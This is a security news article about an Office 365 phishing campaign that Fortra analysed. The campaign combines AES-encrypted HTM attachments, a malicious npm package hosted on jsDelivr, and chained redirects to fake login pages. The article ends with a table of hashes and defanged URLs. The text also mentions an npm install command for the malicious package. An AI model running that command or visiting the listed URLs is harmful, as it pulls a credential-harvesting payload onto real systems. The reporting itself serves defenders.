Fortra’s Suspicious Email Analysis (SEA) team uncovered a highly sophisticated phishing campaign targeting Microsoft O365 users, marking a significant escalation in the technical complexity of credential harvesting threats.
While phishing attacks are a persistent issue, this campaign distinguishes itself by creatively leveraging multiple modern technologies in tandem including Advanced Encryption Standard (AES) encryption, malicious npm (Node Package Manager) packages, and abuse of reputable Content Delivery Networks (CDNs).
This coordinated use of advanced obfuscation, supply chain compromise, and cloud-native redirection mechanisms highlights a new evolution in attack strategies against enterprise users.
The campaign initiates with a phishing email carrying a benign-looking .htm attachment, “EFT-PMT.htm.”
Upon inspection, investigators found that the file concealed its payload using AES encryption an unusual step in phishing kits, where simpler JavaScript obfuscation is the norm.
The encrypted string, when decrypted, revealed a JavaScript file hosted on jsDelivr a widely used CDN for distributing open-source npm packages.
This hosting choice not only lends legitimacy to the attack but also increases the difficulty of detection and remediation.
The referenced JavaScript file belonged to the npm package [email protected], masquerading as a legitimate software library accessible via standard CDN pathways (https://cdn.jsdelivr.net/npm/[email protected]/MOMENTUM/NOW.API.JS).
Post-execution, this script dynamically constructs phishing links personalized with the victim’s email address, redirecting users into a carefully crafted Office 365 login mimic. Credentials entered here are harvested by the adversaries.
Exploiting Development Infrastructure
npm is a cornerstone of JavaScript ecosystem, allowing rapid code reuse by developers.
Malicious actors have long exploited open-source repositories for malware distribution and supply chain attacks, but leveraging them as infrastructure to serve live phishing payloads introduces new risks.
CDNs like jsDelivr further amplify this risk, as their global distribution and trusted reputation can thwart security controls and lend legitimacy to malicious assets.
According to the Report, Fortra’s analysis traced the payloads through both live CDN links and downloaded npm packages.
Even after CDN takedowns, the malicious packages could be installed locally via npm install [email protected], opening the “MOMENTUM” directory and the critical NOW.API.JS script.
This script not only facilitated redirection but embedded technical artifacts (e.g., the victim’s email) directly into the attack flow, increasing the effectiveness of credential harvesting.
O365 Phish Pages
A defining characteristic of this campaign is the use of chained, multi-stage redirection.
Malicious URLs embedded in the JavaScript payload (such as those under natrium100gram.site and various pages.dev domains) were confirmed to host or point toward active phishing infrastructure, ultimately leading to fake Office 365 login portals indistinguishable from legitimate authentication pages.
Cloudflare and other infrastructure providers have responded by blocking known malicious endpoints, but attackers have adapted with new package versions (e.g., [email protected]) and fresh phishing URLs.
Malware sandboxes like Any.Run captured the final phishing sites before takedown, demonstrating the adversaries’ intent: harvesting enterprise credentials at scale using dynamic, infrastructure-as-code principles.
This campaign underscores an alarming trend: attackers are integrating advanced cryptography, supply chain infiltration, and cloud-native delivery into phishing operations.
By chaining together AES-encrypted payloads, npm-based code execution, and trusted CDNs, adversaries can evade detection and rapidly adapt to countermeasures.
Organizations must escalate their security posture, including continuous monitoring of developer dependencies, defense against encrypted payloads, and vigilant tracking of redirection patterns in emails and cloud services.
As attacker sophistication accelerates, defenders should expect further convergence of supply chain compromise and phishing, necessitating robust, contextual threat intelligence.
IOCs Table
| Indicator | Type | Description / Notes |
|---|---|---|
| 5d33bd347d0525731c375048f8cb228cb6ab54bbf883fbc9a862e457a4137653 | SHA256 | EFT-PMT.htm malicious attachment |
| hxxps://cdn.jsdelivr.net/npm/[email protected]/MOMENTUM/NOW.API.JS | URL | Malicious npm package payload hosted on jsDelivr CDN |
| hxxps://natrium100gram.site/public/api/page/redirect | URL | Redirection endpoint for further phishing |
| hxxps://adobe-pending-sign-7834892393293.pages.dev/#?refid= | URL | Redirection/fake Office 365 landing page |
| 35ff658910c0da186ef710711aa1c774756bc6e2855d7783bb2ff0a36edf0308 | SHA256 | NOW.API.JS (version 2.1.9) |
| hxxps://noirlegacy-panel-1.website/uuurrlll | URL | Updated phishing redirect (version 2.1.10) |
| hxxps://sun-shine.pages.dev/#?refid= | URL | Alternate redirection (version 2.1.10) |
| 8f02b3108099ae84d5c242b5ba061abf04034c893d5841ed8492f3637e57043d | SHA256 | NOW.API.JS (version 2.1.10) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
 team uncovered a highly sophisticated phishing campaign targeting Microsoft O365 users.){kind=link}